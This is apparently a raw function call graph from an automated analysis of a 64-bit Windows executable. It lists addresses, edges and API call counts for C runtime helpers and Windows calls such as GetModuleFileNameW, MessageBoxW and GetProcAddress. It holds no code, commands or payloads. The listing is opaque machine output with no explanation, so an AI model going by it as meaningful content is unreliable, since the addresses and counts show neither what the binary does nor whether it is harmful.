7ff61e8f4984 49 API calls 16533->16534 16535 7ff61e8e1cc8 16534->16535 16535->16194 16537 7ff61e8e9390 2 API calls 16536->16537 16538 7ff61e8e89b4 16537->16538 16539 7ff61e8f8238 38 API calls 16538->16539 16540 7ff61e8e89c6 __vcrt_freefls 16539->16540 16540->16208 16542 7ff61e8e45cc 16541->16542 16543 7ff61e8e9390 2 API calls 16542->16543 16544 7ff61e8e45f4 16543->16544 16545 7ff61e8e9390 2 API calls 16544->16545 16546 7ff61e8e4607 16545->16546 17940 7ff61e8f5f94 16546->17940 16549 7ff61e8ec550 _log10_special 8 API calls 16550 7ff61e8e392b 16549->16550 16550->16197 16551 7ff61e8e7f90 16550->16551 16552 7ff61e8e7fb4 16551->16552 16553 7ff61e8f06d4 73 API calls 16552->16553 16554 7ff61e8e808b __vcrt_freefls 16552->16554 16555 7ff61e8e7fd0 16553->16555 16554->16201 16555->16554 18331 7ff61e8f78c8 16555->18331 16557 7ff61e8f06d4 73 API calls 16559 7ff61e8e7fe5 16557->16559 16558 7ff61e8f039c _fread_nolock 53 API calls 16558->16559 16559->16554 16559->16557 16559->16558 16561 7ff61e8f007c 16560->16561 18346 7ff61e8efe28 16561->18346 16563 7ff61e8f0095 16563->16197 16565 7ff61e8ec850 16564->16565 16566 7ff61e8e2734 GetCurrentProcessId 16565->16566 16567 7ff61e8e1c80 49 API calls 16566->16567 16568 7ff61e8e2787 16567->16568 16569 7ff61e8f4984 49 API calls 16568->16569 16570 7ff61e8e27cf 16569->16570 16571 7ff61e8e2620 12 API calls 16570->16571 16572 7ff61e8e27f1 16571->16572 16573 7ff61e8ec550 _log10_special 8 API calls 16572->16573 16574 7ff61e8e2801 16573->16574 16574->16228 16576 7ff61e8e9390 2 API calls 16575->16576 16577 7ff61e8e895c 16576->16577 16578 7ff61e8e9390 2 API calls 16577->16578 16579 7ff61e8e896c 16578->16579 16580 7ff61e8f8238 38 API calls 16579->16580 16581 7ff61e8e897a __vcrt_freefls 16580->16581 16581->16211 16583 7ff61e8e1c80 49 API calls 16582->16583 16584 7ff61e8e44fd 16583->16584 16584->16238 16586 7ff61e8e1c80 49 API calls 16585->16586 16587 7ff61e8e4660 16586->16587 16587->16257 16587->16587 16589 7ff61e8e6dd5 16588->16589 16590 7ff61e8f4f08 _get_daylight 11 API calls 16589->16590 16593 7ff61e8e3e6c 16589->16593 16591 7ff61e8e6de2 16590->16591 16592 7ff61e8e2910 54 API calls 16591->16592 16592->16593 16594 7ff61e8e7340 16593->16594 18357 7ff61e8e1470 16594->18357 16596 7ff61e8e7368 16597 7ff61e8e4630 49 API calls 16596->16597 16607 7ff61e8e74b9 __vcrt_freefls 16596->16607 16598 7ff61e8e738a 16597->16598 16599 7ff61e8e738f 16598->16599 16600 7ff61e8e4630 49 API calls 16598->16600 16601 7ff61e8e2a50 54 API calls 16599->16601 16602 7ff61e8e73ae 16600->16602 16601->16607 16602->16599 16603 7ff61e8e4630 49 API calls 16602->16603 16604 7ff61e8e73ca 16603->16604 16604->16599 16605 7ff61e8e73d3 16604->16605 16606 7ff61e8e2710 54 API calls 16605->16606 16608 7ff61e8e7443 memcpy_s __vcrt_freefls 16605->16608 16606->16607 16607->16291 16608->16291 16610 7ff61e8e6e1c 16609->16610 16612 7ff61e8e1840 45 API calls 16610->16612 16614 7ff61e8e6faa 16610->16614 16615 7ff61e8e1c80 49 API calls 16610->16615 16617 7ff61e8e6f3f 16610->16617 16618 7ff61e8e6f97 16610->16618 16620 7ff61e8e4560 10 API calls 16610->16620 16621 7ff61e8e7e20 52 API calls 16610->16621 16622 7ff61e8e2a50 54 API calls 16610->16622 16623 7ff61e8e6f84 16610->16623 16625 7ff61e8e1600 118 API calls 16610->16625 16626 7ff61e8e6f6d 16610->16626 16611 7ff61e8ec550 _log10_special 8 API calls 16613 7ff61e8e6f51 16611->16613 16612->16610 16613->16294 16616 7ff61e8e2710 54 API calls 16614->16616 16615->16610 16616->16617 16617->16611 16619 7ff61e8e2710 54 API calls 16618->16619 16619->16617 16620->16610 16621->16610 16622->16610 16624 7ff61e8e2710 54 API calls 16623->16624 16624->16617 16625->16610 16627 7ff61e8e2710 54 API calls 16626->16627 16627->16617 18387 7ff61e8e8e80 16628->18387 16630 7ff61e8e71c9 16631 7ff61e8e8e80 3 API calls 16630->16631 16632 7ff61e8e71dc 16631->16632 16633 7ff61e8e720f 16632->16633 16634 7ff61e8e71f4 16632->16634 16635 7ff61e8e2710 54 API calls 16633->16635 18391 7ff61e8e76c0 GetProcAddress 16634->18391 16637 7ff61e8e3eb7 16635->16637 16637->16305 16645 7ff61e8ec850 16644->16645 16646 7ff61e8e2a74 GetCurrentProcessId 16645->16646 16647 7ff61e8e1c80 49 API calls 16646->16647 16648 7ff61e8e2ac7 16647->16648 16649 7ff61e8f4984 49 API calls 16648->16649 16650 7ff61e8e2b0f 16649->16650 16651 7ff61e8e2620 12 API calls 16650->16651 16652 7ff61e8e2b31 16651->16652 16653 7ff61e8ec550 _log10_special 8 API calls 16652->16653 16654 7ff61e8e2b41 16653->16654 18463 7ff61e8e6360 16662->18463 16665 7ff61e8e3399 16671 7ff61e8e3670 16665->16671 16667 7ff61e8e3381 16667->16665 18531 7ff61e8e6050 16667->18531 16669 7ff61e8e338d 16669->16665 18540 7ff61e8e61e0 16669->18540 16672 7ff61e8e367e 16671->16672 16673 7ff61e8e368f 16672->16673 18751 7ff61e8e8e60 FreeLibrary 16672->18751 16673->16283 16682 7ff61e8f546c EnterCriticalSection 16675->16682 16684 7ff61e8e36bc GetModuleFileNameW 16683->16684 16684->16375 16684->16376 16686 7ff61e8e92d2 16685->16686 16687 7ff61e8e92bf FindClose 16685->16687 16688 7ff61e8ec550 _log10_special 8 API calls 16686->16688 16687->16686 16689 7ff61e8e371a 16688->16689 16689->16380 16689->16381 16691 7ff61e8ec850 16690->16691 16692 7ff61e8e2c70 GetCurrentProcessId 16691->16692 16721 7ff61e8e26b0 16692->16721 16694 7ff61e8e2cb9 16725 7ff61e8f4bd8 16694->16725 16697 7ff61e8e26b0 48 API calls 16698 7ff61e8e2d34 FormatMessageW 16697->16698 16700 7ff61e8e2d7f MessageBoxW 16698->16700 16701 7ff61e8e2d6d 16698->16701 16703 7ff61e8ec550 _log10_special 8 API calls 16700->16703 16702 7ff61e8e26b0 48 API calls 16701->16702 16702->16700 16704 7ff61e8e2daf 16703->16704 16704->16388 16706 7ff61e8e9340 GetFinalPathNameByHandleW CloseHandle 16705->16706 16707 7ff61e8e3730 16705->16707 16706->16707 16707->16389 16707->16390 16709 7ff61e8e2834 16708->16709 16710 7ff61e8e26b0 48 API calls 16709->16710 16711 7ff61e8e2887 16710->16711 16712 7ff61e8f4bd8 48 API calls 16711->16712 16713 7ff61e8e28d0 MessageBoxW 16712->16713 16714 7ff61e8ec550 _log10_special 8 API calls 16713->16714 16715 7ff61e8e2900 16714->16715 16715->16388 16717 7ff61e8e946a WideCharToMultiByte 16716->16717 16719 7ff61e8e9495 16716->16719 16717->16719 16720 7ff61e8e94ab __vcrt_freefls 16717->16720 16718 7ff61e8e94b2 WideCharToMultiByte 16718->16720 16719->16718 16719->16720 16720->16387 16722 7ff61e8e26d5 16721->16722 16723 7ff61e8f4bd8 48 API calls 16722->16723 16724 7ff61e8e26f8 16723->16724 16724->16694 16726 7ff61e8f4c32 16725->16726 16727 7ff61e8f4c57 16726->16727 16729 7ff61e8f4c93 16726->16729 16728 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16727->16728 16732 7ff61e8f4c81 16728->16732 16743 7ff61e8f2f90 16729->16743 16731 7ff61e8f4d74 16734 7ff61e8fa948 __free_lconv_num 11 API calls 16731->16734 16733 7ff61e8ec550 _log10_special 8 API calls 16732->16733 16735 7ff61e8e2d04 16733->16735 16734->16732 16735->16697 16737 7ff61e8f4d9a 16737->16731 16739 7ff61e8f4da4 16737->16739 16738 7ff61e8f4d49 16740 7ff61e8fa948 __free_lconv_num 11 API calls 16738->16740 16742 7ff61e8fa948 __free_lconv_num 11 API calls 16739->16742 16740->16732 16741 7ff61e8f4d40 16741->16731 16741->16738 16742->16732 16744 7ff61e8f2fce 16743->16744 16745 7ff61e8f2fbe 16743->16745 16746 7ff61e8f2fd7 16744->16746 16750 7ff61e8f3005 16744->16750 16749 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16745->16749 16747 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16746->16747 16748 7ff61e8f2ffd 16747->16748 16748->16731 16748->16737 16748->16738 16748->16741 16749->16748 16750->16745 16750->16748 16754 7ff61e8f39a4 16750->16754 16787 7ff61e8f33f0 16750->16787 16824 7ff61e8f2b80 16750->16824 16755 7ff61e8f39e6 16754->16755 16756 7ff61e8f3a57 16754->16756 16757 7ff61e8f3a81 16755->16757 16758 7ff61e8f39ec 16755->16758 16759 7ff61e8f3ab0 16756->16759 16760 7ff61e8f3a5c 16756->16760 16847 7ff61e8f1d54 16757->16847 16761 7ff61e8f3a20 16758->16761 16762 7ff61e8f39f1 16758->16762 16766 7ff61e8f3ac7 16759->16766 16768 7ff61e8f3aba 16759->16768 16773 7ff61e8f3abf 16759->16773 16763 7ff61e8f3a91 16760->16763 16764 7ff61e8f3a5e 16760->16764 16769 7ff61e8f39f7 16761->16769 16761->16773 16762->16766 16762->16769 16854 7ff61e8f1944 16763->16854 16767 7ff61e8f3a00 16764->16767 16776 7ff61e8f3a6d 16764->16776 16861 7ff61e8f46ac 16766->16861 16786 7ff61e8f3af0 16767->16786 16827 7ff61e8f4158 16767->16827 16768->16757 16768->16773 16769->16767 16774 7ff61e8f3a32 16769->16774 16783 7ff61e8f3a1b 16769->16783 16773->16786 16865 7ff61e8f2164 16773->16865 16774->16786 16837 7ff61e8f4494 16774->16837 16776->16757 16778 7ff61e8f3a72 16776->16778 16778->16786 16843 7ff61e8f4558 16778->16843 16779 7ff61e8ec550 _log10_special 8 API calls 16781 7ff61e8f3dea 16779->16781 16781->16750 16785 7ff61e8f3cdc 16783->16785 16783->16786 16872 7ff61e8f47c0 16783->16872 16785->16786 16878 7ff61e8fea08 16785->16878 16786->16779 16788 7ff61e8f3414 16787->16788 16789 7ff61e8f33fe 16787->16789 16792 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16788->16792 16793 7ff61e8f3454 16788->16793 16790 7ff61e8f39e6 16789->16790 16791 7ff61e8f3a57 16789->16791 16789->16793 16794 7ff61e8f3a81 16790->16794 16795 7ff61e8f39ec 16790->16795 16796 7ff61e8f3ab0 16791->16796 16797 7ff61e8f3a5c 16791->16797 16792->16793 16793->16750 16802 7ff61e8f1d54 38 API calls 16794->16802 16798 7ff61e8f3a20 16795->16798 16799 7ff61e8f39f1 16795->16799 16803 7ff61e8f3ac7 16796->16803 16805 7ff61e8f3aba 16796->16805 16810 7ff61e8f3abf 16796->16810 16800 7ff61e8f3a91 16797->16800 16801 7ff61e8f3a5e 16797->16801 16806 7ff61e8f39f7 16798->16806 16798->16810 16799->16803 16799->16806 16808 7ff61e8f1944 38 API calls 16800->16808 16804 7ff61e8f3a00 16801->16804 16813 7ff61e8f3a6d 16801->16813 16817 7ff61e8f3a1b 16802->16817 16807 7ff61e8f46ac 45 API calls 16803->16807 16809 7ff61e8f4158 47 API calls 16804->16809 16822 7ff61e8f3af0 16804->16822 16805->16794 16805->16810 16806->16804 16811 7ff61e8f3a32 16806->16811 16806->16817 16807->16817 16808->16817 16809->16817 16812 7ff61e8f2164 38 API calls 16810->16812 16810->16822 16814 7ff61e8f4494 46 API calls 16811->16814 16811->16822 16812->16817 16813->16794 16815 7ff61e8f3a72 16813->16815 16814->16817 16818 7ff61e8f4558 37 API calls 16815->16818 16815->16822 16816 7ff61e8ec550 _log10_special 8 API calls 16819 7ff61e8f3dea 16816->16819 16820 7ff61e8f47c0 45 API calls 16817->16820 16817->16822 16823 7ff61e8f3cdc 16817->16823 16818->16817 16819->16750 16820->16823 16821 7ff61e8fea08 46 API calls 16821->16823 16822->16816 16823->16821 16823->16822 17072 7ff61e8f0fc8 16824->17072 16828 7ff61e8f417e 16827->16828 16890 7ff61e8f0b80 16828->16890 16833 7ff61e8f47c0 45 API calls 16835 7ff61e8f42c3 16833->16835 16834 7ff61e8f47c0 45 API calls 16836 7ff61e8f4351 16834->16836 16835->16834 16835->16835 16835->16836 16836->16783 16838 7ff61e8f44c9 16837->16838 16839 7ff61e8f44e7 16838->16839 16840 7ff61e8f47c0 45 API calls 16838->16840 16842 7ff61e8f450e 16838->16842 16841 7ff61e8fea08 46 API calls 16839->16841 16840->16839 16841->16842 16842->16783 16846 7ff61e8f4579 16843->16846 16844 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16845 7ff61e8f45aa 16844->16845 16845->16783 16846->16844 16846->16845 16848 7ff61e8f1d87 16847->16848 16849 7ff61e8f1db6 16848->16849 16851 7ff61e8f1e73 16848->16851 16853 7ff61e8f1df3 16849->16853 17026 7ff61e8f0c28 16849->17026 16852 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16851->16852 16852->16853 16853->16783 16855 7ff61e8f1977 16854->16855 16856 7ff61e8f19a6 16855->16856 16858 7ff61e8f1a63 16855->16858 16857 7ff61e8f0c28 12 API calls 16856->16857 16860 7ff61e8f19e3 16856->16860 16857->16860 16859 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16858->16859 16859->16860 16860->16783 16862 7ff61e8f46ef 16861->16862 16864 7ff61e8f46f3 __crtLCMapStringW 16862->16864 17034 7ff61e8f4748 16862->17034 16864->16783 16866 7ff61e8f2197 16865->16866 16867 7ff61e8f21c6 16866->16867 16869 7ff61e8f2283 16866->16869 16868 7ff61e8f0c28 12 API calls 16867->16868 16871 7ff61e8f2203 16867->16871 16868->16871 16870 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16869->16870 16870->16871 16871->16783 16873 7ff61e8f47d7 16872->16873 17038 7ff61e8fd9b8 16873->17038 16879 7ff61e8fea39 16878->16879 16887 7ff61e8fea47 16878->16887 16880 7ff61e8fea67 16879->16880 16881 7ff61e8f47c0 45 API calls 16879->16881 16879->16887 16882 7ff61e8fea9f 16880->16882 16883 7ff61e8fea78 16880->16883 16881->16880 16885 7ff61e8feb2a 16882->16885 16886 7ff61e8feac9 16882->16886 16882->16887 17062 7ff61e9000a0 16883->17062 16888 7ff61e8ff8a0 _fread_nolock MultiByteToWideChar 16885->16888 16886->16887 17065 7ff61e8ff8a0 16886->17065 16887->16785 16888->16887 16891 7ff61e8f0bb7 16890->16891 16897 7ff61e8f0ba6 16890->16897 16892 7ff61e8fd5fc _fread_nolock 12 API calls 16891->16892 16891->16897 16893 7ff61e8f0be4 16892->16893 16894 7ff61e8f0bf8 16893->16894 16895 7ff61e8fa948 __free_lconv_num 11 API calls 16893->16895 16896 7ff61e8fa948 __free_lconv_num 11 API calls 16894->16896 16895->16894 16896->16897 16898 7ff61e8fe570 16897->16898 16899 7ff61e8fe5c0 16898->16899 16900 7ff61e8fe58d 16898->16900 16899->16900 16903 7ff61e8fe5f2 16899->16903 16901 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16900->16901 16902 7ff61e8f42a1 16901->16902 16902->16833 16902->16835 16908 7ff61e8fe705 16903->16908 16913 7ff61e8fe63a 16903->16913 16904 7ff61e8fe7f7 16953 7ff61e8fda5c 16904->16953 16906 7ff61e8fe7bd 16946 7ff61e8fddf4 16906->16946 16907 7ff61e8fe78c 16939 7ff61e8fe0d4 16907->16939 16908->16904 16908->16906 16908->16907 16910 7ff61e8fe74f 16908->16910 16912 7ff61e8fe745 16908->16912 16929 7ff61e8fe304 16910->16929 16912->16906 16915 7ff61e8fe74a 16912->16915 16913->16902 16920 7ff61e8fa4a4 16913->16920 16915->16907 16915->16910 16918 7ff61e8fa900 _isindst 17 API calls 16919 7ff61e8fe854 16918->16919 16921 7ff61e8fa4b1 16920->16921 16922 7ff61e8fa4bb 16920->16922 16921->16922 16927 7ff61e8fa4d6 16921->16927 16923 7ff61e8f4f08 _get_daylight 11 API calls 16922->16923 16924 7ff61e8fa4c2 16923->16924 16925 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 16924->16925 16926 7ff61e8fa4ce 16925->16926 16926->16902 16926->16918 16927->16926 16928 7ff61e8f4f08 _get_daylight 11 API calls 16927->16928 16928->16924 16962 7ff61e9040ac 16929->16962 16933 7ff61e8fe3ac 16934 7ff61e8fe401 16933->16934 16936 7ff61e8fe3cc 16933->16936 16938 7ff61e8fe3b0 16933->16938 17015 7ff61e8fdef0 16934->17015 17011 7ff61e8fe1ac 16936->17011 16938->16902 16940 7ff61e9040ac 38 API calls 16939->16940 16941 7ff61e8fe11e 16940->16941 16942 7ff61e903af4 37 API calls 16941->16942 16943 7ff61e8fe16e 16942->16943 16944 7ff61e8fe172 16943->16944 16945 7ff61e8fe1ac 45 API calls 16943->16945 16944->16902 16945->16944 16947 7ff61e9040ac 38 API calls 16946->16947 16948 7ff61e8fde3f 16947->16948 16949 7ff61e903af4 37 API calls 16948->16949 16950 7ff61e8fde97 16949->16950 16951 7ff61e8fde9b 16950->16951 16952 7ff61e8fdef0 45 API calls 16950->16952 16951->16902 16952->16951 16954 7ff61e8fdad4 16953->16954 16955 7ff61e8fdaa1 16953->16955 16957 7ff61e8fdaec 16954->16957 16959 7ff61e8fdb6d 16954->16959 16956 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 16955->16956 16961 7ff61e8fdacd __scrt_get_show_window_mode 16956->16961 16958 7ff61e8fddf4 46 API calls 16957->16958 16958->16961 16960 7ff61e8f47c0 45 API calls 16959->16960 16959->16961 16960->16961 16961->16902 16963 7ff61e9040ff fegetenv 16962->16963 16964 7ff61e907e2c 37 API calls 16963->16964 16967 7ff61e904152 16964->16967 16965 7ff61e90417f 16970 7ff61e8fa4a4 __std_exception_copy 37 API calls 16965->16970 16966 7ff61e904242 16968 7ff61e907e2c 37 API calls 16966->16968 16967->16966 16972 7ff61e90421c 16967->16972 16973 7ff61e90416d 16967->16973 16969 7ff61e90426c 16968->16969 16974 7ff61e907e2c 37 API calls 16969->16974 16971 7ff61e9041fd 16970->16971 16975 7ff61e905324 16971->16975 16981 7ff61e904205 16971->16981 16976 7ff61e8fa4a4 __std_exception_copy 37 API calls 16972->16976 16973->16965 16973->16966 16977 7ff61e90427d 16974->16977 16978 7ff61e8fa900 _isindst 17 API calls 16975->16978 16976->16971 16979 7ff61e908020 20 API calls 16977->16979 16980 7ff61e905339 16978->16980 16989 7ff61e9042e6 __scrt_get_show_window_mode 16979->16989 16982 7ff61e8ec550 _log10_special 8 API calls 16981->16982 16983 7ff61e8fe351 16982->16983 17007 7ff61e903af4 16983->17007 16984 7ff61e90468f __scrt_get_show_window_mode 16985 7ff61e9049cf 16986 7ff61e903c10 37 API calls 16985->16986 16993 7ff61e9050e7 16986->16993 16987 7ff61e90497b 16987->16985 16990 7ff61e90533c memcpy_s 37 API calls 16987->16990 16988 7ff61e904327 memcpy_s 17001 7ff61e904c6b memcpy_s __scrt_get_show_window_mode 16988->17001 17005 7ff61e904783 memcpy_s __scrt_get_show_window_mode 16988->17005 16989->16984 16989->16988 16991 7ff61e8f4f08 _get_daylight 11 API calls 16989->16991 16990->16985 16992 7ff61e904760 16991->16992 16994 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 16992->16994 16995 7ff61e90533c memcpy_s 37 API calls 16993->16995 17000 7ff61e905142 16993->17000 16994->16988 16995->17000 16996 7ff61e9052c8 16998 7ff61e907e2c 37 API calls 16996->16998 16997 7ff61e8f4f08 11 API calls _get_daylight 16997->17005 16998->16981 16999 7ff61e8f4f08 11 API calls _get_daylight 16999->17001 17000->16996 17002 7ff61e903c10 37 API calls 17000->17002 17006 7ff61e90533c memcpy_s 37 API calls 17000->17006 17001->16985 17001->16987 17001->16999 17003 7ff61e8fa8e0 37 API calls _invalid_parameter_noinfo 17001->17003 17002->17000 17003->17001 17004 7ff61e8fa8e0 37 API calls _invalid_parameter_noinfo 17004->17005 17005->16987 17005->16997 17005->17004 17006->17000 17008 7ff61e903b13 17007->17008 17009 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17008->17009 17010 7ff61e903b3e memcpy_s 17008->17010 17009->17010 17010->16933 17012 7ff61e8fe1d8 memcpy_s 17011->17012 17013 7ff61e8f47c0 45 API calls 17012->17013 17014 7ff61e8fe292 memcpy_s __scrt_get_show_window_mode 17012->17014 17013->17014 17014->16938 17016 7ff61e8fdf2b 17015->17016 17019 7ff61e8fdf78 memcpy_s 17015->17019 17017 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17016->17017 17018 7ff61e8fdf57 17017->17018 17018->16938 17019->17019 17020 7ff61e8fdfe3 17019->17020 17022 7ff61e8f47c0 45 API calls 17019->17022 17021 7ff61e8fa4a4 __std_exception_copy 37 API calls 17020->17021 17025 7ff61e8fe025 memcpy_s 17021->17025 17022->17020 17023 7ff61e8fa900 _isindst 17 API calls 17024 7ff61e8fe0d0 17023->17024 17025->17023 17027 7ff61e8f0c5f 17026->17027 17032 7ff61e8f0c4e 17026->17032 17028 7ff61e8fd5fc _fread_nolock 12 API calls 17027->17028 17027->17032 17029 7ff61e8f0c90 17028->17029 17031 7ff61e8fa948 __free_lconv_num 11 API calls 17029->17031 17033 7ff61e8f0ca4 17029->17033 17030 7ff61e8fa948 __free_lconv_num 11 API calls 17030->17032 17031->17033 17032->16853 17033->17030 17035 7ff61e8f4766 17034->17035 17037 7ff61e8f476e 17034->17037 17036 7ff61e8f47c0 45 API calls 17035->17036 17036->17037 17037->16864 17039 7ff61e8fd9d1 17038->17039 17040 7ff61e8f47ff 17038->17040 17039->17040 17046 7ff61e903304 17039->17046 17042 7ff61e8fda24 17040->17042 17043 7ff61e8fda3d 17042->17043 17045 7ff61e8f480f 17042->17045 17043->17045 17059 7ff61e902650 17043->17059 17045->16785 17047 7ff61e8fb150 __CxxCallCatchBlock 45 API calls 17046->17047 17048 7ff61e903313 17047->17048 17049 7ff61e90335e 17048->17049 17058 7ff61e9002d8 EnterCriticalSection 17048->17058 17049->17040 17060 7ff61e8fb150 __CxxCallCatchBlock 45 API calls 17059->17060 17061 7ff61e902659 17060->17061 17068 7ff61e906d88 17062->17068 17067 7ff61e8ff8a9 MultiByteToWideChar 17065->17067 17071 7ff61e906dec 17068->17071 17069 7ff61e8ec550 _log10_special 8 API calls 17070 7ff61e9000bd 17069->17070 17070->16887 17071->17069 17073 7ff61e8f100f 17072->17073 17074 7ff61e8f0ffd 17072->17074 17076 7ff61e8f101d 17073->17076 17081 7ff61e8f1059 17073->17081 17075 7ff61e8f4f08 _get_daylight 11 API calls 17074->17075 17077 7ff61e8f1002 17075->17077 17078 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17076->17078 17079 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17077->17079 17086 7ff61e8f100d 17078->17086 17079->17086 17080 7ff61e8f13d5 17082 7ff61e8f4f08 _get_daylight 11 API calls 17080->17082 17080->17086 17081->17080 17083 7ff61e8f4f08 _get_daylight 11 API calls 17081->17083 17084 7ff61e8f1669 17082->17084 17085 7ff61e8f13ca 17083->17085 17087 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17084->17087 17088 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17085->17088 17086->16750 17087->17086 17088->17080 17090 7ff61e8f0704 17089->17090 17117 7ff61e8f0464 17090->17117 17092 7ff61e8f071d 17092->16404 17129 7ff61e8f03bc 17093->17129 17097 7ff61e8ec850 17096->17097 17098 7ff61e8e2930 GetCurrentProcessId 17097->17098 17099 7ff61e8e1c80 49 API calls 17098->17099 17100 7ff61e8e2979 17099->17100 17143 7ff61e8f4984 17100->17143 17105 7ff61e8e1c80 49 API calls 17106 7ff61e8e29ff 17105->17106 17173 7ff61e8e2620 17106->17173 17109 7ff61e8ec550 _log10_special 8 API calls 17110 7ff61e8e2a31 17109->17110 17110->16443 17112 7ff61e8e1b89 17111->17112 17113 7ff61e8f0119 17111->17113 17112->16442 17112->16443 17114 7ff61e8f4f08 _get_daylight 11 API calls 17113->17114 17115 7ff61e8f011e 17114->17115 17116 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17115->17116 17116->17112 17118 7ff61e8f04ce 17117->17118 17119 7ff61e8f048e 17117->17119 17118->17119 17120 7ff61e8f04da 17118->17120 17121 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17119->17121 17128 7ff61e8f546c EnterCriticalSection 17120->17128 17124 7ff61e8f04b5 17121->17124 17124->17092 17130 7ff61e8f03e6 17129->17130 17141 7ff61e8e1a20 17129->17141 17131 7ff61e8f03f5 __scrt_get_show_window_mode 17130->17131 17132 7ff61e8f0432 17130->17132 17130->17141 17134 7ff61e8f4f08 _get_daylight 11 API calls 17131->17134 17142 7ff61e8f546c EnterCriticalSection 17132->17142 17136 7ff61e8f040a 17134->17136 17138 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 17136->17138 17138->17141 17141->16411 17141->16412 17146 7ff61e8f49de 17143->17146 17144 7ff61e8f4a03 17145 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17144->17145 17151 7ff61e8f4a2d 17145->17151 17146->17144 17147 7ff61e8f4a3f 17146->17147 17182 7ff61e8f2c10 17147->17182 17149 7ff61e8f4b1c 17150 7ff61e8fa948 __free_lconv_num 11 API calls 17149->17150 17150->17151 17152 7ff61e8ec550 _log10_special 8 API calls 17151->17152 17154 7ff61e8e29c3 17152->17154 17161 7ff61e8f5160 17154->17161 17155 7ff61e8f4b40 17155->17149 17158 7ff61e8f4b4a 17155->17158 17156 7ff61e8f4af1 17159 7ff61e8fa948 __free_lconv_num 11 API calls 17156->17159 17157 7ff61e8f4ae8 17157->17149 17157->17156 17160 7ff61e8fa948 __free_lconv_num 11 API calls 17158->17160 17159->17151 17160->17151 17162 7ff61e8fb2c8 _get_daylight 11 API calls 17161->17162 17163 7ff61e8f5177 17162->17163 17164 7ff61e8feb98 _get_daylight 11 API calls 17163->17164 17167 7ff61e8f51b7 17163->17167 17169 7ff61e8e29e5 17163->17169 17165 7ff61e8f51ac 17164->17165 17166 7ff61e8fa948 __free_lconv_num 11 API calls 17165->17166 17166->17167 17167->17169 17320 7ff61e8fec20 17167->17320 17169->17105 17171 7ff61e8fa900 _isindst 17 API calls 17172 7ff61e8f51fc 17171->17172 17174 7ff61e8e262f 17173->17174 17175 7ff61e8e9390 2 API calls 17174->17175 17176 7ff61e8e2660 17175->17176 17177 7ff61e8e2683 MessageBoxA 17176->17177 17178 7ff61e8e266f MessageBoxW 17176->17178 17179 7ff61e8e2690 17177->17179 17178->17179 17180 7ff61e8ec550 _log10_special 8 API calls 17179->17180 17181 7ff61e8e26a0 17180->17181 17181->17109 17183 7ff61e8f2c4e 17182->17183 17184 7ff61e8f2c3e 17182->17184 17185 7ff61e8f2c57 17183->17185 17194 7ff61e8f2c85 17183->17194 17186 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17184->17186 17187 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17185->17187 17188 7ff61e8f2c7d 17186->17188 17187->17188 17188->17149 17188->17155 17188->17156 17188->17157 17189 7ff61e8f47c0 45 API calls 17189->17194 17191 7ff61e8f2f34 17193 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17191->17193 17193->17184 17194->17184 17194->17188 17194->17189 17194->17191 17196 7ff61e8f35a0 17194->17196 17222 7ff61e8f3268 17194->17222 17252 7ff61e8f2af0 17194->17252 17197 7ff61e8f3655 17196->17197 17198 7ff61e8f35e2 17196->17198 17199 7ff61e8f36af 17197->17199 17200 7ff61e8f365a 17197->17200 17201 7ff61e8f367f 17198->17201 17202 7ff61e8f35e8 17198->17202 17199->17201 17212 7ff61e8f36be 17199->17212 17220 7ff61e8f3618 17199->17220 17203 7ff61e8f368f 17200->17203 17204 7ff61e8f365c 17200->17204 17269 7ff61e8f1b50 17201->17269 17209 7ff61e8f35ed 17202->17209 17202->17212 17276 7ff61e8f1740 17203->17276 17205 7ff61e8f35fd 17204->17205 17211 7ff61e8f366b 17204->17211 17221 7ff61e8f36ed 17205->17221 17255 7ff61e8f3f04 17205->17255 17209->17205 17210 7ff61e8f3630 17209->17210 17209->17220 17210->17221 17265 7ff61e8f43c0 17210->17265 17211->17201 17214 7ff61e8f3670 17211->17214 17212->17221 17283 7ff61e8f1f60 17212->17283 17217 7ff61e8f4558 37 API calls 17214->17217 17214->17221 17216 7ff61e8ec550 _log10_special 8 API calls 17218 7ff61e8f3983 17216->17218 17217->17220 17218->17194 17220->17221 17290 7ff61e8fe858 17220->17290 17221->17216 17223 7ff61e8f3273 17222->17223 17224 7ff61e8f3289 17222->17224 17226 7ff61e8f3655 17223->17226 17227 7ff61e8f35e2 17223->17227 17235 7ff61e8f32c7 17223->17235 17225 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 17224->17225 17224->17235 17225->17235 17228 7ff61e8f365a 17226->17228 17234 7ff61e8f36af 17226->17234 17229 7ff61e8f367f 17227->17229 17230 7ff61e8f35e8 17227->17230 17231 7ff61e8f368f 17228->17231 17233 7ff61e8f365c 17228->17233 17236 7ff61e8f1b50 38 API calls 17229->17236 17237 7ff61e8f35ed 17230->17237 17240 7ff61e8f36be 17230->17240 17238 7ff61e8f1740 38 API calls 17231->17238 17232 7ff61e8f35fd 17239 7ff61e8f3f04 47 API calls 17232->17239 17251 7ff61e8f36ed 17232->17251 17233->17232 17241 7ff61e8f366b 17233->17241 17234->17229 17234->17240 17250 7ff61e8f3618 17234->17250 17235->17194 17236->17250 17237->17232 17242 7ff61e8f3630 17237->17242 17237->17250 17238->17250 